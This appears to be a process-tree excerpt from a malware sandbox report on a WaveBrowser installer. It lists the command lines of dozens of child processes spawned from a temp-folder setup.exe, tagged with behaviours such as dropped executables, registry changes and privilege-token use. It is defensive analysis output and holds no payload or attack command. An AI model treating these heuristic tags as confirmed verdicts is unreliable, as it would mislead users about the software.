C:\Users\Admin\AppData\Local\Temp\nseA52B.tmp\setup.exeC:\Users\Admin\AppData\Local\Temp\nseA52B.tmp\setup.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\WaveBrowser\User Data\Crashpad" --annotation=channel= --annotation=plat=Win64 --annotation=prod=WaveBrowser --annotation=ver=1.5.18.2 --initial-client-data=0x258,0x25c,0x260,0x21c,0x264,0x7ff7c45c12d0,0x7ff7c45c12dc,0x7ff7c45c12e84⤵
- Executes dropped EXE
PID:5848
-
-
C:\Users\Admin\AppData\Local\Temp\nseA52B.tmp\setup.exe"C:\Users\Admin\AppData\Local\Temp\nseA52B.tmp\setup.exe" --verbose-logging --installerdata="C:\Users\Admin\AppData\Local\Temp\guiA28B.tmp" --create-shortcuts=0 --install-level=04⤵
- Executes dropped EXE
PID:2892 -
C:\Users\Admin\AppData\Local\Temp\nseA52B.tmp\setup.exeC:\Users\Admin\AppData\Local\Temp\nseA52B.tmp\setup.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\WaveBrowser\User Data\Crashpad" --annotation=channel= --annotation=plat=Win64 --annotation=prod=WaveBrowser --annotation=ver=1.5.18.2 --initial-client-data=0x258,0x25c,0x260,0x234,0x264,0x7ff7c45c12d0,0x7ff7c45c12dc,0x7ff7c45c12e85⤵
- Executes dropped EXE
PID:1892
-
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --install-type=1 --from-installer4⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
- Checks system information in the registry
- Drops file in Program Files directory
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SendNotifyMessage
PID:3796 -
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\WaveBrowser\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\WaveBrowser\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\WaveBrowser\User Data" --annotation=channel= --annotation=plat=Win64 --annotation=prod=WaveBrowser --annotation=ver=1.5.18.2 --initial-client-data=0x100,0x104,0x108,0xe4,0x10c,0x7ffd834eccf0,0x7ffd834eccfc,0x7ffd834ecd085⤵
- Executes dropped EXE
- Loads dropped DLL
PID:5572
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=gpu-process --no-appcompat-clear --start-stack-profiler --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=2044,i,8590214971664215756,13595371377568635989,262144 --variations-seed-version=15 --mojo-platform-channel-handle=2040 /prefetch:25⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1056
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --start-stack-profiler --field-trial-handle=1936,i,8590214971664215756,13595371377568635989,262144 --variations-seed-version=15 --mojo-platform-channel-handle=2112 /prefetch:35⤵
- Executes dropped EXE
- Loads dropped DLL
PID:3760
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2316,i,8590214971664215756,13595371377568635989,262144 --variations-seed-version=15 --mojo-platform-channel-handle=2284 /prefetch:85⤵
- Executes dropped EXE
- Loads dropped DLL
PID:4680
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3000,i,8590214971664215756,13595371377568635989,262144 --variations-seed-version=15 --mojo-platform-channel-handle=3396 /prefetch:15⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
PID:5716
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=renderer --extension-process --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3008,i,8590214971664215756,13595371377568635989,262144 --variations-seed-version=15 --mojo-platform-channel-handle=3236 /prefetch:25⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
PID:1472
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=chrome.mojom.ProfileImport --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=3952,i,8590214971664215756,13595371377568635989,262144 --variations-seed-version=15 --mojo-platform-channel-handle=4008 /prefetch:85⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
PID:5884
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4532,i,8590214971664215756,13595371377568635989,262144 --variations-seed-version=15 --mojo-platform-channel-handle=4560 /prefetch:85⤵
- Executes dropped EXE
- Loads dropped DLL
PID:5152
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4676,i,8590214971664215756,13595371377568635989,262144 --variations-seed-version=15 --mojo-platform-channel-handle=2332 /prefetch:85⤵
- Executes dropped EXE
- Loads dropped DLL
PID:6028
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4560,i,8590214971664215756,13595371377568635989,262144 --variations-seed-version=15 --mojo-platform-channel-handle=4612 /prefetch:85⤵
- Executes dropped EXE
- Loads dropped DLL
PID:5636
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --field-trial-handle=4596,i,8590214971664215756,13595371377568635989,262144 --variations-seed-version=15 --mojo-platform-channel-handle=4872 /prefetch:15⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
PID:5272
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --field-trial-handle=4672,i,8590214971664215756,13595371377568635989,262144 --variations-seed-version=15 --mojo-platform-channel-handle=4600 /prefetch:15⤵
- Executes dropped EXE
- Loads dropped DLL
PID:5268
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --field-trial-handle=4508,i,8590214971664215756,13595371377568635989,262144 --variations-seed-version=15 --mojo-platform-channel-handle=5000 /prefetch:15⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
PID:3712
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --field-trial-handle=4492,i,8590214971664215756,13595371377568635989,262144 --variations-seed-version=15 --mojo-platform-channel-handle=5164 /prefetch:15⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
PID:1644
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --field-trial-handle=4696,i,8590214971664215756,13595371377568635989,262144 --variations-seed-version=15 --mojo-platform-channel-handle=5316 /prefetch:15⤵
- Executes dropped EXE
- Loads dropped DLL
PID:3648
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --field-trial-handle=4692,i,8590214971664215756,13595371377568635989,262144 --variations-seed-version=15 --mojo-platform-channel-handle=5432 /prefetch:15⤵
- Executes dropped EXE
- Loads dropped DLL
PID:3480
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=renderer --no-appcompat-clear --start-stack-profiler --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --field-trial-handle=4700,i,8590214971664215756,13595371377568635989,262144 --variations-seed-version=15 --mojo-platform-channel-handle=5596 /prefetch:15⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
PID:620
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --field-trial-handle=4724,i,8590214971664215756,13595371377568635989,262144 --variations-seed-version=15 --mojo-platform-channel-handle=5768 /prefetch:15⤵
- Checks computer location settings
- Executes dropped EXE
PID:4772
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=renderer --instant-process --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --field-trial-handle=4728,i,8590214971664215756,13595371377568635989,262144 --variations-seed-version=15 --mojo-platform-channel-handle=6044 /prefetch:15⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
PID:4132
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=6364,i,8590214971664215756,13595371377568635989,262144 --variations-seed-version=15 --mojo-platform-channel-handle=6400 /prefetch:85⤵
- Executes dropped EXE
- Loads dropped DLL
PID:5160
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=6524,i,8590214971664215756,13595371377568635989,262144 --variations-seed-version=15 --mojo-platform-channel-handle=6540 /prefetch:85⤵
- Executes dropped EXE
- Loads dropped DLL
PID:3644
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --field-trial-handle=6684,i,8590214971664215756,13595371377568635989,262144 --variations-seed-version=15 --mojo-platform-channel-handle=6744 /prefetch:15⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
PID:5844
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --field-trial-handle=6868,i,8590214971664215756,13595371377568635989,262144 --variations-seed-version=15 --mojo-platform-channel-handle=6344 /prefetch:15⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
PID:1608
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --field-trial-handle=6676,i,8590214971664215756,13595371377568635989,262144 --variations-seed-version=15 --mojo-platform-channel-handle=6688 /prefetch:15⤵
- Checks computer location settings
- Executes dropped EXE
PID:5540
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --field-trial-handle=7216,i,8590214971664215756,13595371377568635989,262144 --variations-seed-version=15 --mojo-platform-channel-handle=7232 /prefetch:15⤵
- Checks computer location settings
- Executes dropped EXE
PID:6056
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4088,i,8590214971664215756,13595371377568635989,262144 --variations-seed-version=15 --mojo-platform-channel-handle=6572 /prefetch:85⤵
- Executes dropped EXE
PID:6276
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4072,i,8590214971664215756,13595371377568635989,262144 --variations-seed-version=15 --mojo-platform-channel-handle=5004 /prefetch:85⤵
- Executes dropped EXE
PID:6364
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4868,i,8590214971664215756,13595371377568635989,262144 --variations-seed-version=15 --mojo-platform-channel-handle=5724 /prefetch:85⤵
- Executes dropped EXE
PID:6384
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=7520,i,8590214971664215756,13595371377568635989,262144 --variations-seed-version=15 --mojo-platform-channel-handle=6544 /prefetch:85⤵
- Executes dropped EXE
PID:6508
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=6420,i,8590214971664215756,13595371377568635989,262144 --variations-seed-version=15 --mojo-platform-channel-handle=7644 /prefetch:85⤵
- Executes dropped EXE
PID:6668
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=6484,i,8590214971664215756,13595371377568635989,262144 --variations-seed-version=15 --mojo-platform-channel-handle=7664 /prefetch:85⤵
- Executes dropped EXE
PID:6700
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=6672,i,8590214971664215756,13595371377568635989,262144 --variations-seed-version=15 --mojo-platform-channel-handle=7812 /prefetch:85⤵
- Executes dropped EXE
PID:6820
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=7968,i,8590214971664215756,13595371377568635989,262144 --variations-seed-version=15 --mojo-platform-channel-handle=7980 /prefetch:85⤵PID:6876
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=8104,i,8590214971664215756,13595371377568635989,262144 --variations-seed-version=15 --mojo-platform-channel-handle=7948 /prefetch:85⤵PID:6936
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=8108,i,8590214971664215756,13595371377568635989,262144 --variations-seed-version=15 --mojo-platform-channel-handle=8264 /prefetch:85⤵PID:7052
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=8096,i,8590214971664215756,13595371377568635989,262144 --variations-seed-version=15 --mojo-platform-channel-handle=8408 /prefetch:85⤵PID:7112
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5704,i,8590214971664215756,13595371377568635989,262144 --variations-seed-version=15 --mojo-platform-channel-handle=5596 /prefetch:85⤵PID:6296
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=5840,i,8590214971664215756,13595371377568635989,262144 --variations-seed-version=15 --mojo-platform-channel-handle=5552 /prefetch:85⤵PID:6336
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=7656,i,8590214971664215756,13595371377568635989,262144 --variations-seed-version=15 --mojo-platform-channel-handle=5000 /prefetch:85⤵PID:6692
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=6600,i,8590214971664215756,13595371377568635989,262144 --variations-seed-version=15 --mojo-platform-channel-handle=6368 /prefetch:85⤵PID:6724
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=6592,i,8590214971664215756,13595371377568635989,262144 --variations-seed-version=15 --mojo-platform-channel-handle=8380 /prefetch:85⤵PID:6712
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=6408,i,8590214971664215756,13595371377568635989,262144 --variations-seed-version=15 --mojo-platform-channel-handle=8064 /prefetch:85⤵PID:6776
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4668,i,8590214971664215756,13595371377568635989,262144 --variations-seed-version=15 --mojo-platform-channel-handle=6616 /prefetch:85⤵PID:7012
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=7892,i,8590214971664215756,13595371377568635989,262144 --variations-seed-version=15 --mojo-platform-channel-handle=7928 /prefetch:85⤵PID:7024
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=7876,i,8590214971664215756,13595371377568635989,262144 --variations-seed-version=15 --mojo-platform-channel-handle=7628 /prefetch:85⤵PID:7064
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4768,i,8590214971664215756,13595371377568635989,262144 --variations-seed-version=15 --mojo-platform-channel-handle=7576 /prefetch:85⤵PID:7132
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=7580,i,8590214971664215756,13595371377568635989,262144 --variations-seed-version=15 --mojo-platform-channel-handle=7544 /prefetch:85⤵PID:7056
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=3572,i,8590214971664215756,13595371377568635989,262144 --variations-seed-version=15 --mojo-platform-channel-handle=5724 /prefetch:85⤵PID:6268
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=6360,i,8590214971664215756,13595371377568635989,262144 --variations-seed-version=15 --mojo-platform-channel-handle=4616 /prefetch:85⤵PID:6220
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=6292,i,8590214971664215756,13595371377568635989,262144 --variations-seed-version=15 --mojo-platform-channel-handle=4772 /prefetch:85⤵PID:6280
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=7212,i,8590214971664215756,13595371377568635989,262144 --variations-seed-version=15 --mojo-platform-channel-handle=5756 /prefetch:85⤵PID:6480
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=8520,i,8590214971664215756,13595371377568635989,262144 --variations-seed-version=15 --mojo-platform-channel-handle=5560 /prefetch:85⤵PID:6008
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=8628,i,8590214971664215756,13595371377568635989,262144 --variations-seed-version=15 --mojo-platform-channel-handle=8504 /prefetch:85⤵PID:6492
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=8392,i,8590214971664215756,13595371377568635989,262144 --variations-seed-version=15 --mojo-platform-channel-handle=5588 /prefetch:85⤵PID:3612
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5748,i,8590214971664215756,13595371377568635989,262144 --variations-seed-version=15 --mojo-platform-channel-handle=8832 /prefetch:85⤵PID:6460
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=8856,i,8590214971664215756,13595371377568635989,262144 --variations-seed-version=15 --mojo-platform-channel-handle=8904 /prefetch:85⤵PID:6392
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5868,i,8590214971664215756,13595371377568635989,262144 --variations-seed-version=15 --mojo-platform-channel-handle=5856 /prefetch:85⤵PID:6196
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=9176,i,8590214971664215756,13595371377568635989,262144 --variations-seed-version=15 --mojo-platform-channel-handle=9188 /prefetch:85⤵PID:6204
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=9168,i,8590214971664215756,13595371377568635989,262144 --variations-seed-version=15 --mojo-platform-channel-handle=8892 /prefetch:85⤵PID:6940
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=9360,i,8590214971664215756,13595371377568635989,262144 --variations-seed-version=15 --mojo-platform-channel-handle=9372 /prefetch:85⤵PID:6112
-
-
